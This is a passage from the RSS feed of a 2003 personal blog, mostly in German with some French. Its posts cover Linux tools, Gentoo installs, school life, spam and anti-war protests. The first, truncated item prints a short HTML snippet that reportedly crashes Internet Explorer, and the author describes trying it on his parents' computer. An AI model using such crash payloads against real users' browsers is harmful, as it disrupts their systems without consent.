  12520.    <content:encoded><![CDATA[Bei <a href="http://rm.digigeek.net/"><b>rm</b></a> hab ich gerade 'n netten IE-Bug gefunden, der nur mit HTML den IE zum Absturz bringt.<br>Natürlich musste ich das gleich ausprobieren und nun seht selbst, was aufm Computer meiner Eltern (jep, bei mir hat es nur noch Linux!) passiert ist *eg*<br><br><a href="https://blog.x-way.org/images/ie-bug.gif"><b>Screenshot</b></a><br><br><a href="https://web.archive.org/web/20030622132016/http://roman.mainer.de/misc/funstuff/ie_crash_html_only.html"><b>Selber machen</b></a>
  12521. <br><br>
  12522. <pre>
  12523. &lt;html&gt;
  12524. &lt;form&gt;
  12525. &lt;input type crash&gt;
  12526. &lt;/form&gt;
  12527. &lt;/html&gt;
  12528. </pre>
  12529. ]]></content:encoded>
  12530.  </item>
  12531.  
  12532.  <item>
  12533.    <title>Ferienstress</title>
  12534.    <link>https://blog.x-way.org/Misc/2003/04/20/Ferienstress.html</link>
  12535.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323948</guid>
  12536.    <dc:creator>Andreas Jaggi</dc:creator>
  12537.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12538.    <pubDate>Sun, 20 Apr 2003 03:25:00 +0000</pubDate>
  12539.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12540.    <description><![CDATA[Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur für die anstehenden Maturaprüfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fürs Internet, Weblog etc. übrigbleibt.<br>Ich versuche nicht wie <a href="http://rm.digigeek.net/"><b>rm</b></a> gleich alles einzustellen (was für mich sicher auch die bessere Wahl wäre *g*), sondern quasi live ausm Prüffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)
  12541. ]]></description>
  12542.    <content:encoded><![CDATA[Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur für die anstehenden Maturaprüfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fürs Internet, Weblog etc. übrigbleibt.<br>Ich versuche nicht wie <a href="http://rm.digigeek.net/"><b>rm</b></a> gleich alles einzustellen (was für mich sicher auch die bessere Wahl wäre *g*), sondern quasi live ausm Prüffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)
  12543. ]]></content:encoded>
  12544.  </item>
  12545.  
  12546.  <item>
  12547.    <title>XPde</title>
  12548.    <link>https://blog.x-way.org/Linux/2003/04/05/XPde.html</link>
  12549.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323947</guid>
  12550.    <dc:creator>Andreas Jaggi</dc:creator>
  12551.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12552.    <pubDate>Sat, 05 Apr 2003 17:44:00 +0000</pubDate>
  12553.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12554.    <description><![CDATA[Heute habe ich <a href="http://xpde.com/"><b>XPde</b></a> ausprobiert. Es ist ein dem Windows XP old-style Look nachempfundener Window-Manager.<br>Sieht nett aus, hat aber noch einige Bugs (daher ist es bei Portage auch noch gemasked).<br><br><a href="https://blog.x-way.org/images/xpde.png"><b>Monitorschuss?</b></a>
  12555. ]]></description>
  12556.    <content:encoded><![CDATA[Heute habe ich <a href="http://xpde.com/"><b>XPde</b></a> ausprobiert. Es ist ein dem Windows XP old-style Look nachempfundener Window-Manager.<br>Sieht nett aus, hat aber noch einige Bugs (daher ist es bei Portage auch noch gemasked).<br><br><a href="https://blog.x-way.org/images/xpde.png"><b>Monitorschuss?</b></a>
  12557. ]]></content:encoded>
  12558.  </item>
  12559.  
  12560.  <item>
  12561.    <title>Mozilla macht Kaffee</title>
  12562.    <link>https://blog.x-way.org/Linux/2003/04/02/Mozilla_macht_Kaffee.html</link>
  12563.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323946</guid>
  12564.    <dc:creator>Andreas Jaggi</dc:creator>
  12565.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12566.    <pubDate>Wed, 02 Apr 2003 22:40:00 +0000</pubDate>
  12567.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12568.    <description><![CDATA[Bei einigen Unix-Distributionen (Debian, Gentoo, Solaris...) will Mozilla/Phoenix nicht mit dem Plugin der auf dem System installierten Java-VM zusammenarbeiten und verlangt den Download einer eigenen Java-VM. Ich habe bisher schon viele verschiedenen Lösungsansätze gesehen, jedoch hat bei mir noch keiner funktioniert :-)<br>Vorhin jedoch ist über die LUGS-Mailingliste gerade einer ins Postfach geflattert, der so simpel wie funktionstüchtig ist:<br><br>Anstatt die ganze Plugin-Geschichte herumzukopieren oder herumzuinstallieren, macht man einfach im /usr/lib/phoenix/plugins oder /usr/lib/mozilla/plugins Verzeichnis einen Link (libjavaplugin_oji.so) zu /JAVAPFAD/xx/yy/zz/javaplugin_oji.so, variert je nach Distribution und Java-VM!<br><br>Bei mir funktioniert nun Java endlich auch im Phoenix *freu*
  12569. ]]></description>
  12570.    <content:encoded><![CDATA[Bei einigen Unix-Distributionen (Debian, Gentoo, Solaris...) will Mozilla/Phoenix nicht mit dem Plugin der auf dem System installierten Java-VM zusammenarbeiten und verlangt den Download einer eigenen Java-VM. Ich habe bisher schon viele verschiedenen Lösungsansätze gesehen, jedoch hat bei mir noch keiner funktioniert :-)<br>Vorhin jedoch ist über die LUGS-Mailingliste gerade einer ins Postfach geflattert, der so simpel wie funktionstüchtig ist:<br><br>Anstatt die ganze Plugin-Geschichte herumzukopieren oder herumzuinstallieren, macht man einfach im /usr/lib/phoenix/plugins oder /usr/lib/mozilla/plugins Verzeichnis einen Link (libjavaplugin_oji.so) zu /JAVAPFAD/xx/yy/zz/javaplugin_oji.so, variert je nach Distribution und Java-VM!<br><br>Bei mir funktioniert nun Java endlich auch im Phoenix *freu*
  12571. ]]></content:encoded>
  12572.  </item>
  12573.  
  12574.  <item>
  12575.    <title>April, April!</title>
  12576.    <link>https://blog.x-way.org/Misc/2003/04/01/April_April.html</link>
  12577.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323945</guid>
  12578.    <dc:creator>Andreas Jaggi</dc:creator>
  12579.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12580.    <pubDate>Tue, 01 Apr 2003 00:25:00 +0000</pubDate>
  12581.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12582.    <description><![CDATA[Für alle, die sich morgen über die abstrusesten Zeitungsartikel wundern.
  12583. ]]></description>
  12584.    <content:encoded><![CDATA[Für alle, die sich morgen über die abstrusesten Zeitungsartikel wundern.
  12585. ]]></content:encoded>
  12586.  </item>
  12587.  
  12588.  <item>
  12589.    <title>uptime</title>
  12590.    <link>https://blog.x-way.org/Linux/2003/03/29/uptime.html</link>
  12591.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=297</guid>
  12592.    <dc:creator>Andreas Jaggi</dc:creator>
  12593.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12594.    <pubDate>Sat, 29 Mar 2003 15:13:00 +0000</pubDate>
  12595.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12596.    <description><![CDATA[<a href="https://blog.x-way.org/images/uptime.png"><b>uptime</b></a>
  12597. ]]></description>
  12598.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/uptime.png"><b>uptime</b></a>
  12599. ]]></content:encoded>
  12600.  </item>
  12601.  
  12602.  <item>
  12603.    <title>Informationen zum Thema Spam</title>
  12604.    <link>https://blog.x-way.org/Misc/2003/03/29/Informationen_zum_Thema_Spam.html</link>
  12605.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=296</guid>
  12606.    <dc:creator>Andreas Jaggi</dc:creator>
  12607.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12608.    <pubDate>Sat, 29 Mar 2003 01:28:00 +0000</pubDate>
  12609.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12610.    <description><![CDATA[Aus aktuellen Anlass (ich habe Spam direkt von der Domain unserer Schule bekommen!) habe ich mich noch einmal ein bisschen umgeschaut und bin auch fündig geworden.<br><br><a href="https://web.archive.org/web/20030426141011/http://www.trash.net/~roman/"><b>Informationen zum Thema Spam (inkl. Antwortvorlage für die Schweiz!)</b></a><br><a href="#" class="gone"><b>Artikel im Saldo (kostenpflichtig)</b></a>
  12611. ]]></description>
  12612.    <content:encoded><![CDATA[Aus aktuellen Anlass (ich habe Spam direkt von der Domain unserer Schule bekommen!) habe ich mich noch einmal ein bisschen umgeschaut und bin auch fündig geworden.<br><br><a href="https://web.archive.org/web/20030426141011/http://www.trash.net/~roman/"><b>Informationen zum Thema Spam (inkl. Antwortvorlage für die Schweiz!)</b></a><br><a href="#" class="gone"><b>Artikel im Saldo (kostenpflichtig)</b></a>
  12613. ]]></content:encoded>
  12614.  </item>
  12615.  
  12616.  <item>
  12617.    <title>SelfLinux</title>
  12618.    <link>https://blog.x-way.org/Linux/2003/03/28/SelfLinux.html</link>
  12619.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=295</guid>
  12620.    <dc:creator>Andreas Jaggi</dc:creator>
  12621.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12622.    <pubDate>Fri, 28 Mar 2003 01:18:00 +0000</pubDate>
  12623.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12624.    <description><![CDATA[So wie <a href="http://selfhtml.org/"><b>SelfHTML</b></a> für HTML gibt es auch <a href="https://web.archive.org/web/20030411084011/http://www.selflinux.de/"><b>SelfLinux</b></a>. Befindet sich momentan noch im Aufbau, bietet aber trotzdem schon einige nützliche Informationen.
  12625. ]]></description>
  12626.    <content:encoded><![CDATA[So wie <a href="http://selfhtml.org/"><b>SelfHTML</b></a> für HTML gibt es auch <a href="https://web.archive.org/web/20030411084011/http://www.selflinux.de/"><b>SelfLinux</b></a>. Befindet sich momentan noch im Aufbau, bietet aber trotzdem schon einige nützliche Informationen.
  12627. ]]></content:encoded>
  12628.  </item>
  12629.  
  12630.  <item>
  12631.    <title>Bush, Blair, assasins, mais l'ONU ne fait rien!</title>
  12632.    <link>https://blog.x-way.org/Misc/2003/03/26/Bush_Blair_assasins_mais_lONU_ne_fait_rien.html</link>
  12633.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=294</guid>
  12634.    <dc:creator>Andreas Jaggi</dc:creator>
  12635.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12636.    <pubDate>Wed, 26 Mar 2003 23:34:00 +0000</pubDate>
  12637.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12638.    <description><![CDATA[<p><a href="https://blog.x-way.org/stuff/ChronikEinesAngek%FCndigtenKrieges.pdf"><b>Chronik eines angekündigten Krieges</b></a></p><p><a href="https://blog.x-way.org/stuff/PACE.pdf"><b>PACE</b></a></p><p><a href="https://blog.x-way.org/stuff/Wanted.pdf"><b>WANTED</b></a></p><p>Weitere PDFs zur Weltpolitik findet man <a href="http://anotherposterforpeace.com/"><b>hier</b></a> und <a href="https://web.archive.org/web/20030327100912/http://protestposters.org/"><b>hier</b></a>.</p>
  12639. ]]></description>
  12640.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/stuff/ChronikEinesAngek%FCndigtenKrieges.pdf"><b>Chronik eines angekündigten Krieges</b></a></p><p><a href="https://blog.x-way.org/stuff/PACE.pdf"><b>PACE</b></a></p><p><a href="https://blog.x-way.org/stuff/Wanted.pdf"><b>WANTED</b></a></p><p>Weitere PDFs zur Weltpolitik findet man <a href="http://anotherposterforpeace.com/"><b>hier</b></a> und <a href="https://web.archive.org/web/20030327100912/http://protestposters.org/"><b>hier</b></a>.</p>
  12641. ]]></content:encoded>
  12642.  </item>
  12643.  
  12644.  <item>
  12645.    <title>So siehts aus</title>
  12646.    <link>https://blog.x-way.org/Misc/2003/03/23/So_siehts_aus.html</link>
  12647.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=289</guid>
  12648.    <dc:creator>Andreas Jaggi</dc:creator>
  12649.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12650.    <pubDate>Sun, 23 Mar 2003 21:27:00 +0000</pubDate>
  12651.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12652.    <description><![CDATA[<a href="https://web.archive.org/web/20030807050756/http://360degrees.gmgn.de/" title="360degrees.gmgn.de (archive.org)">gi</a> hat ein <a href="#" class="gone"><b>Bild</b></a> der Welt gemacht.
  12653. ]]></description>
  12654.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030807050756/http://360degrees.gmgn.de/" title="360degrees.gmgn.de (archive.org)">gi</a> hat ein <a href="#" class="gone"><b>Bild</b></a> der Welt gemacht.
  12655. ]]></content:encoded>
  12656.  </item>
  12657.  
  12658.  <item>
  12659.    <title>Tous ensemble, tous ensemble, non à la guerre!</title>
  12660.    <link>https://blog.x-way.org/Misc/2003/03/22/Tous_ensemble_tous_ensemble_non_a_la_guerre.html</link>
  12661.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=287</guid>
  12662.    <dc:creator>Andreas Jaggi</dc:creator>
  12663.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12664.    <pubDate>Sat, 22 Mar 2003 21:17:00 +0000</pubDate>
  12665.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12666.    <description><![CDATA[Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'<a href="http://www.epfl.ch/"><b>EPFL</b></a>. Bon, je pense que je ferais là mes études.<br>Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la <a href="http://gssa.ch/agenda.php#ag96"><b>manifestation nationale contre la guerre</b></a>.
  12667. ]]></description>
  12668.    <content:encoded><![CDATA[Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'<a href="http://www.epfl.ch/"><b>EPFL</b></a>. Bon, je pense que je ferais là mes études.<br>Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la <a href="http://gssa.ch/agenda.php#ag96"><b>manifestation nationale contre la guerre</b></a>.
  12669. ]]></content:encoded>
  12670.  </item>
  12671.  
  12672.  <item>
  12673.    <title>Auch Programmierer sind Menschen</title>
  12674.    <link>https://blog.x-way.org/Coding/2003/03/16/Auch_Programmierer_sind_Menschen.html</link>
  12675.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=286</guid>
  12676.    <dc:creator>Andreas Jaggi</dc:creator>
  12677.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12678.    <pubDate>Sun, 16 Mar 2003 13:42:00 +0000</pubDate>
  12679.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  12680.    <description><![CDATA[<span style="font-family: monospace; font-size: 1em;">checking for something to drink while compiling... err: no fridge found</span><br><br>Ist mir gerade beim installieren von <a href="http://tilp.info/index.php"><b>TiLP</b></a> aufgefallen :-)
  12681. ]]></description>
  12682.    <content:encoded><![CDATA[<span style="font-family: monospace; font-size: 1em;">checking for something to drink while compiling... err: no fridge found</span><br><br>Ist mir gerade beim installieren von <a href="http://tilp.info/index.php"><b>TiLP</b></a> aufgefallen :-)
  12683. ]]></content:encoded>
  12684.  </item>
  12685.  
  12686.  <item>
  12687.    <title>Tada</title>
  12688.    <link>https://blog.x-way.org/Linux/2003/03/12/Tada.html</link>
  12689.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=285</guid>
  12690.    <dc:creator>Andreas Jaggi</dc:creator>
  12691.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12692.    <pubDate>Wed, 12 Mar 2003 15:09:00 +0000</pubDate>
  12693.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12694.    <description><![CDATA[Nachdem ich letztens meine Platte zerlöchert habe, hab ich nun alles Partitionen darauf platt gemacht und  Gentoo ganz neu installiert.<br><br><a href="https://blog.x-way.org/images/12032003151515.png"><b>Screenshot</b></a>
  12695. ]]></description>
  12696.    <content:encoded><![CDATA[Nachdem ich letztens meine Platte zerlöchert habe, hab ich nun alles Partitionen darauf platt gemacht und  Gentoo ganz neu installiert.<br><br><a href="https://blog.x-way.org/images/12032003151515.png"><b>Screenshot</b></a>
  12697. ]]></content:encoded>
  12698.  </item>
  12699.  
  12700.  <item>
  12701.    <title>Heisenbergsche Raum-Zeit-Unschärfe</title>
  12702.    <link>https://blog.x-way.org/School/2003/03/12/Heisenbergsche_Raum-Zeit-Unschaerfe.html</link>
  12703.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=284</guid>
  12704.    <dc:creator>Andreas Jaggi</dc:creator>
  12705.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12706.    <pubDate>Wed, 12 Mar 2003 14:07:00 +0000</pubDate>
  12707.    <category domain="https://blog.x-way.org/School">School</category>
  12708.    <description><![CDATA[Dies und weiteres solches Zeugs heben wir gerade im Physik durchgenommen. Und im übertragenen Sinn könnte ich es auch gerade auf mein momentanes Leben anwenden.<br>Letzte Woche hatte ich die ganze Zeit Proben und diese Woche kommt es so, dass andauernd Lektionen ausfallen und ich pro Tag manchmal nur gerade 2 Lektionen in die Schule gehe und mich dann wieder nach Hause begeben kann. Bei einem einstündigen Schulweg, ist also die für die Schule aufgewendete Tara-Zeit grösser als die Netto-Zeit!
  12709. ]]></description>
  12710.    <content:encoded><![CDATA[Dies und weiteres solches Zeugs heben wir gerade im Physik durchgenommen. Und im übertragenen Sinn könnte ich es auch gerade auf mein momentanes Leben anwenden.<br>Letzte Woche hatte ich die ganze Zeit Proben und diese Woche kommt es so, dass andauernd Lektionen ausfallen und ich pro Tag manchmal nur gerade 2 Lektionen in die Schule gehe und mich dann wieder nach Hause begeben kann. Bei einem einstündigen Schulweg, ist also die für die Schule aufgewendete Tara-Zeit grösser als die Netto-Zeit!
  12711. ]]></content:encoded>
  12712.  </item>
  12713.  
  12714.  <item>
  12715.    <title>Schule und so</title>
  12716.    <link>https://blog.x-way.org/Misc/2003/03/06/Schule_und_so.html</link>
  12717.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=283</guid>
  12718.    <dc:creator>Andreas Jaggi</dc:creator>
  12719.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12720.    <pubDate>Thu, 06 Mar 2003 01:06:00 +0000</pubDate>
  12721.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12722.    <description><![CDATA[Ich bin wieder einmal einen 'Vortrag' am vorbereiten, diesmal in Geschichte, dass ich ja bekanntlich auf französisch durchexerziere ;-)<br><br>Und wie alle sicher schon wissen, bin ich wieder einmal besonders früh besonders weit. Sprich: ich habe jetzt erst einen Drittel gemacht und muss um 5 Uhr schon wieder aufstehen...<br><br>So, nun ist genug Selbstmitleid geflossen, jetzt sollte ich wieder weitermachen.<br><br><a href="https://web.archive.org/web/20030320221657/http://metku.net/"><b>Hier</b></a> hats viele lustige Mods. Vielleicht sollte ich noch erwähnen, dass ich erstmals an meinem Computer herumgelötet hab, genauer am Netzteil. Ich hab nämlich die Lüfter rausgelötet und zwei superleise 12db-1500rpm-Papst-Lüfter reingelötet. Und, das Überraschendste: es läuft noch und zwar angenehm leise *g*
  12723. ]]></description>
  12724.    <content:encoded><![CDATA[Ich bin wieder einmal einen 'Vortrag' am vorbereiten, diesmal in Geschichte, dass ich ja bekanntlich auf französisch durchexerziere ;-)<br><br>Und wie alle sicher schon wissen, bin ich wieder einmal besonders früh besonders weit. Sprich: ich habe jetzt erst einen Drittel gemacht und muss um 5 Uhr schon wieder aufstehen...<br><br>So, nun ist genug Selbstmitleid geflossen, jetzt sollte ich wieder weitermachen.<br><br><a href="https://web.archive.org/web/20030320221657/http://metku.net/"><b>Hier</b></a> hats viele lustige Mods. Vielleicht sollte ich noch erwähnen, dass ich erstmals an meinem Computer herumgelötet hab, genauer am Netzteil. Ich hab nämlich die Lüfter rausgelötet und zwei superleise 12db-1500rpm-Papst-Lüfter reingelötet. Und, das Überraschendste: es läuft noch und zwar angenehm leise *g*
  12725. ]]></content:encoded>
  12726.  </item>
  12727.  
  12728.  <item>
  12729.    <title>Nachtrag zu Linux - Windows</title>
  12730.    <link>https://blog.x-way.org/Linux/2003/03/01/Nachtrag_zu_Linux_-_Windows.html</link>
  12731.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=282</guid>
  12732.    <dc:creator>Andreas Jaggi</dc:creator>
  12733.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12734.    <pubDate>Sat, 01 Mar 2003 20:21:00 +0000</pubDate>
  12735.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12736.    <description><![CDATA[Nach kurzem Testen muss ich ein Lob für <a href="https://web.archive.org/web/20030706214033/http://www.tuningsoft.com/projects/projects.htm#ext2fsd">Ext2Fsd (Ext2 File System Driver)<b></b></a> schreiben. Damit und mit dem dabei mitgebrachten mount-Utility kann man eine Ext2/3-Partition ganz einfach mit einem beliebigen Laufwerksbuchstaben quasi in den 'Arbeitsplatz' mounten ;-)<br>Natürlich funktioniert das auch mit Win-Partitionen.<br><br>Desweiteren werde ich gleich <a href="http://www.acc.umu.se/~bosse/"><b>SwapFs</b></a> ausprobieren, das eine Linux-Swap-Partition unter Windows dem Auslagerungsspeicher zur Verfügung stellen soll.<br><br>Und vielleicht kann jemand <a href="https://web.archive.org/web/20030416140513/http://uranus.it.swin.edu.au/~jn/linux/bootlinux.htm"><b>dieses Tutorial (Booting Linux from the NT boot loader)</b></a> gebrauchen, ich habe mich für GRUB entschieden :-)
  12737. ]]></description>
  12738.    <content:encoded><![CDATA[Nach kurzem Testen muss ich ein Lob für <a href="https://web.archive.org/web/20030706214033/http://www.tuningsoft.com/projects/projects.htm#ext2fsd">Ext2Fsd (Ext2 File System Driver)<b></b></a> schreiben. Damit und mit dem dabei mitgebrachten mount-Utility kann man eine Ext2/3-Partition ganz einfach mit einem beliebigen Laufwerksbuchstaben quasi in den 'Arbeitsplatz' mounten ;-)<br>Natürlich funktioniert das auch mit Win-Partitionen.<br><br>Desweiteren werde ich gleich <a href="http://www.acc.umu.se/~bosse/"><b>SwapFs</b></a> ausprobieren, das eine Linux-Swap-Partition unter Windows dem Auslagerungsspeicher zur Verfügung stellen soll.<br><br>Und vielleicht kann jemand <a href="https://web.archive.org/web/20030416140513/http://uranus.it.swin.edu.au/~jn/linux/bootlinux.htm"><b>dieses Tutorial (Booting Linux from the NT boot loader)</b></a> gebrauchen, ich habe mich für GRUB entschieden :-)
  12739. ]]></content:encoded>
  12740.  </item>
  12741.  
  12742.  <item>
  12743.    <title>Nochetwas Linux-Windows</title>
  12744.    <link>https://blog.x-way.org/Linux/2003/03/01/Nochetwas_Linux-Windows.html</link>
  12745.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=281</guid>
  12746.    <dc:creator>Andreas Jaggi</dc:creator>
  12747.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12748.    <pubDate>Sat, 01 Mar 2003 19:52:00 +0000</pubDate>
  12749.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12750.    <description><![CDATA[<a href="https://web.archive.org/web/20030221235043/http://uranus.it.swin.edu.au/~jn/linux/explore2fs.htm"><b>Explore2fds</b></a> ist ein Windows-Explorer ähnlicher Dateimanager für ext2/3 Partitionen für Windows oder so ;-)<br><br>Sehr nützlich!
  12751. ]]></description>
  12752.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030221235043/http://uranus.it.swin.edu.au/~jn/linux/explore2fs.htm"><b>Explore2fds</b></a> ist ein Windows-Explorer ähnlicher Dateimanager für ext2/3 Partitionen für Windows oder so ;-)<br><br>Sehr nützlich!
  12753. ]]></content:encoded>
  12754.  </item>
  12755.  
  12756.  <item>
  12757.    <title>Linux - Windows</title>
  12758.    <link>https://blog.x-way.org/Linux/2003/03/01/Linux_-_Windows.html</link>
  12759.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=280</guid>
  12760.    <dc:creator>Andreas Jaggi</dc:creator>
  12761.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12762.    <pubDate>Sat, 01 Mar 2003 19:47:00 +0000</pubDate>
  12763.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12764.    <description><![CDATA[Da ich ja momentan nur mit einer alten Windowsinstallation arbeiten kann, habe ich mich wieder einmal ein bisschen umgeschaut, was für Tools es gibt, damit sich Windows und Linux näher kommen.<br>Auf <a href="https://web.archive.org/web/20030402054819/http://linuxshop.ru/linuxbegin/win-lin-soft-en/"><b>dieser Liste</b></a> habe ich einige gefunden:<br><br>- <a href="http://www.partimage.org/"><b>Partition Image für Linux</b></a><br>- <a href="http://e2fsprogs.sourceforge.net/"><b>Ext2fsprogs</b></a> wovon es auch für Windows eine <a href="https://web.archive.org/web/20030706214033/http://www.tuningsoft.com/projects/projects.htm#ext2fsd"><b>Treiber gibt</b></a> siehe auch <a href="http://sourceforge.net/projects/ext2fsd"><b>hier</b></a><br>- <a href="http://linux-ntfs.sourceforge.net/"><b>Linux-NTFS Project</b></a><br>- <a href="https://web.archive.org/web/20030408062023/http://www.public.iastate.edu/~chadspen/xsmbrowser.html"><b>'Netzwerkumgebung' für Windows</b></a>
  12765. ]]></description>
  12766.    <content:encoded><![CDATA[Da ich ja momentan nur mit einer alten Windowsinstallation arbeiten kann, habe ich mich wieder einmal ein bisschen umgeschaut, was für Tools es gibt, damit sich Windows und Linux näher kommen.<br>Auf <a href="https://web.archive.org/web/20030402054819/http://linuxshop.ru/linuxbegin/win-lin-soft-en/"><b>dieser Liste</b></a> habe ich einige gefunden:<br><br>- <a href="http://www.partimage.org/"><b>Partition Image für Linux</b></a><br>- <a href="http://e2fsprogs.sourceforge.net/"><b>Ext2fsprogs</b></a> wovon es auch für Windows eine <a href="https://web.archive.org/web/20030706214033/http://www.tuningsoft.com/projects/projects.htm#ext2fsd"><b>Treiber gibt</b></a> siehe auch <a href="http://sourceforge.net/projects/ext2fsd"><b>hier</b></a><br>- <a href="http://linux-ntfs.sourceforge.net/"><b>Linux-NTFS Project</b></a><br>- <a href="https://web.archive.org/web/20030408062023/http://www.public.iastate.edu/~chadspen/xsmbrowser.html"><b>'Netzwerkumgebung' für Windows</b></a>
  12767. ]]></content:encoded>
  12768.  </item>
  12769.  
  12770.  <item>
  12771.    <title>Gentoo Linux 1.4_rc3 Released</title>
  12772.    <link>https://blog.x-way.org/Linux/2003/02/27/Gentoo_Linux_14_rc3_Released.html</link>
  12773.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=279</guid>
  12774.    <dc:creator>Andreas Jaggi</dc:creator>
  12775.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12776.    <pubDate>Thu, 27 Feb 2003 16:26:00 +0000</pubDate>
  12777.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12778.    <description><![CDATA[<a href="http://www.gentoo.org"><b>Gentoo</b></a> 1.4_rc3 ist <a href="https://web.archive.org/web/20030401193008/http://distro.ibiblio.org/pub/linux/distributions/gentoo/releases/1.4_rc3/"><b>da</b></a>!
  12779. ]]></description>
  12780.    <content:encoded><![CDATA[<a href="http://www.gentoo.org"><b>Gentoo</b></a> 1.4_rc3 ist <a href="https://web.archive.org/web/20030401193008/http://distro.ibiblio.org/pub/linux/distributions/gentoo/releases/1.4_rc3/"><b>da</b></a>!
  12781. ]]></content:encoded>
  12782.  </item>
  12783.  
  12784.  <item>
  12785.    <title>Ich hab mir wieder einmal Mühe gegeben</title>
  12786.    <link>https://blog.x-way.org/Tech/2003/02/26/Ich_hab_mir_wieder_einmal_Muehe_gegeben.html</link>
  12787.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=278</guid>
  12788.    <dc:creator>Andreas Jaggi</dc:creator>
  12789.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12790.    <pubDate>Wed, 26 Feb 2003 15:24:00 +0000</pubDate>
  12791.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  12792.    <description><![CDATA[Wenn bei einer Option für einen Befehl '(DANGEROUS)' steht, sollte auch der liebenswerte und neugierige Herr Jaggi ein bisschen Vernunft erhaschen und zuerst denken, dann handeln, denn sonst kommt es so, dass er die Festplatte auf UDMA-5 stellt, was nicht funktionieren kann, und dann seine ganze $HOME-Partition (und auch noch ein paar andere) zerlöchert!<br><br>Natürlich liegt das letzte Backup (Ja, ich bin ein FEigling ;-) schon über 2 Wochen zurück und  nützt auch nicht wirklich viel!
  12793. ]]></description>
